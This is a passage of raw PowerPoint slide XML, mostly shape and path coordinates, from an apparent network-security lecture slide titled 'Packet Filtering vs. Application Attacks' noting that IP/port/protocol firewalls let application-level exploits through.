                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619065" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616107" y="15453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="12399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606638" y="8030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603163" y="6543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595258" y="4561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590422" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="619065" y="21187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="585159" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587516" y="21724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591784" y="23418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593369" y="24700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596132" y="28374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596803" y="30563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596803" y="35689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580262" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617503" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620191" y="40589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620902" y="36634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620902" y="27368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620058" y="23418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619947" y="22898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619065" y="21187"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="684850" y="2306"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674162" y="2306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667822" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635939" y="35683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634862" y="42176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634862" y="57023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656706" y="91232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674263" y="96188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685520" y="96188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689077" y="95964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693548" y="95196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693737" y="95196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="88420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681802" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679130" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678963" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672739" y="76337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659084" y="55050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659084" y="43988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681355" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="9830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688284" y="2517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684850" y="2306"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712973" y="66815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="710535" y="66815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709458" y="67781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708056" y="68929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704662" y="71585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702813" y="72832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700822" y="74001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699609" y="74752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698294" y="75535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695924" y="76597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690377" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687573" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="66815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712973" y="19783"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="687573" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690804" y="20297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690565" y="20297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710357" y="31794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="31794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="197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2" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C1A800-FE65-5511-CA9E-E62394856EFB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69311" y="3392450"/>
              <a:ext cx="603854" cy="252007"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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4F0E6512-CB08-EB44-68FD-C9020F944465}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3236480" y="2418079"/>
              <a:ext cx="3568700" cy="1398905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="942860" y="991120"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1016" y="913396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="925550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941844" y="1003274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="942860" y="991120"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="1600758" y="998715"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1600682" y="986523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355318" y="988047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355394" y="1000239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1600758" y="998715"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="3149422" y="10172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3142716" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2226780" y="601967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233485" y="612152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149422" y="10172"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3568700" h="1398904">
                  <a:moveTo>
                    <a:pt x="3568217" y="1388173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2876321" y="987361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2870225" y="997902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3562121" y="1398714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568217" y="1388173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4" name="object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D9450D-3127-D948-046F-10028A437098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92036" y="3604244"/>
              <a:ext cx="527308" cy="990595"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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958A97AF-EB56-CBF1-F8CA-6DA6DD613F8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3254628" y="3241294"/>
              <a:ext cx="3556635" cy="726440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3556634" h="726439">
                  <a:moveTo>
                    <a:pt x="163830" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="120904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121031" y="284734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131699" y="213613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534664" y="725957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3556127" y="583565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153162" y="71119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163830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7AFB3F49-467C-9D36-E459-46544CD84847}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3254628" y="3241294"/>
              <a:ext cx="3556635" cy="726440"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3556634" h="726439">
                  <a:moveTo>
                    <a:pt x="0" y="120904"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="163830" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153162" y="71119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3556127" y="583565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534664" y="725957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131699" y="213613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121031" y="284734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120904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53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3EF0D0-5438-30B3-12EB-E32C2049490B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213401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8" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B7A854-E1C5-E2B9-2E04-B6C9996480F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213401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101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7926409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1F2022F-F0B6-1456-3F79-DC1336439519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532726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Packet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Filtering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vs.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Application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Attacks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C9AC850-8CD1-892D-0273-7375929382D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532726" y="1110476"/>
            <a:ext cx="76168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firewall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only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filter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traffic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using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IP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addresses,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ports,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protocols.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Any</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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kind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application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traffic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pass,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even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hacker's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exploits.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BE650320-CF8E-8DA2-0799-1AF5F6FEBB1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1101382" y="2059242"/>
            <a:ext cx="7166768" cy="2733631"/>
            <a:chOff x="979932" y="2058364"/>
            <a:chExt cx="7166768" cy="2733631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452AE02-AEDE-5240-D02A-6A7963980B7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1004058" y="2294881"/>
              <a:ext cx="3385820" cy="2176145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3385820" h="2176145">
                  <a:moveTo>
                    <a:pt x="1419445" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1314897" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258602" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202306" y="24130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1178180" y="32173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150032" y="40217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073631" y="76412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1025378" y="108586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965062" y="156847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924851" y="197064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908767" y="221194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="892682" y="241303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876598" y="265433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864534" y="285542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852471" y="309672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836387" y="333803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828345" y="361955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812260" y="410215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804218" y="438367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="800197" y="462498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792155" y="518802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792155" y="591193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="768028" y="595215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739881" y="599236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715754" y="607280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687606" y="615323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667501" y="627389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643374" y="643475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623269" y="655541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570995" y="715866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534805" y="784236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="832496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522742" y="864670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="880757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526763" y="904888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498615" y="896844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466446" y="888801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434278" y="884779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406130" y="884779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361898" y="888801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321687" y="892822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281476" y="904888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245286" y="916953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209096" y="933040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144759" y="973257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88464" y="1025539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28147" y="1118039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16084" y="1154234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1226626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1307060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16084" y="1379451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28147" y="1415647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68358" y="1479994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116611" y="1536298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176928" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209096" y="1604668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245286" y="1616733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281476" y="1632820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321687" y="1640863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361898" y="1644885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406130" y="1648907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430256" y="1648907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458404" y="1644885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458404" y="1681080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462425" y="1705211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462425" y="1729341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470467" y="1753471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474488" y="1773580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490573" y="1821841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502636" y="1841949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514699" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575016" y="1946514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631311" y="1998797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671522" y="2030970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715754" y="2059123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="764007" y="2083253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816281" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868556" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924851" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="957020" y="2135535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="985167" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1013315" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045484" y="2143579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077652" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1109821" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174159" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1206327" y="2123470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262623" y="2107383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1294791" y="2099340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1318918" y="2087275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347066" y="2071188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1371192" y="2059123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395319" y="2043036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1423466" y="2026949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443572" y="2010862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467698" y="1994775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1487804" y="1974666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1503888" y="1994775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1523994" y="2018905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544099" y="2034992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568226" y="2055101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592352" y="2071188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1616479" y="2091296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1644627" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676795" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1708964" y="2131514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741133" y="2139557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777323" y="2151622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849702" y="2167709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885892" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1922082" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962293" y="2175753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014567" y="2171731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062820" y="2167709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111073" y="2159666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159326" y="2147600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2199537" y="2135535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2243769" y="2119448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279959" y="2103361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2320170" y="2083253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380487" y="2034992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2408634" y="2010862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2452866" y="1954558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2476993" y="1894232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485035" y="1862058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2505140" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521225" y="1870101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589583" y="1870101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2613710" y="1866080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641858" y="1862058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2665984" y="1854015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690111" y="1841949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730322" y="1817819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746406" y="1797710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766511" y="1781624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782596" y="1765537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794659" y="1745428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2802701" y="1721298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2814765" y="1701189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="1677059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="1652928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2826828" y="1628798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2822807" y="1596624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2818786" y="1568472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2846933" y="1572494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2879102" y="1576516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2907250" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939418" y="1580537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027883" y="1572494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3072115" y="1560429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112325" y="1548363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3152536" y="1532277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188726" y="1512168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253064" y="1463907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3309359" y="1407603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329465" y="1371408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3349570" y="1339234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365654" y="1303038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381739" y="1222604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3385760" y="1182387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381739" y="1142169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3373697" y="1101952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3349570" y="1029561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3329465" y="993365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281211" y="929018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253064" y="900866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3220895" y="876735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188726" y="856627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3152536" y="832496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112325" y="816410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3072115" y="804344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3027883" y="792279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939418" y="784236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2911271" y="788258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883123" y="788258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854976" y="792279"/>
                  </a:lnTo>
                  <a:lnTo>
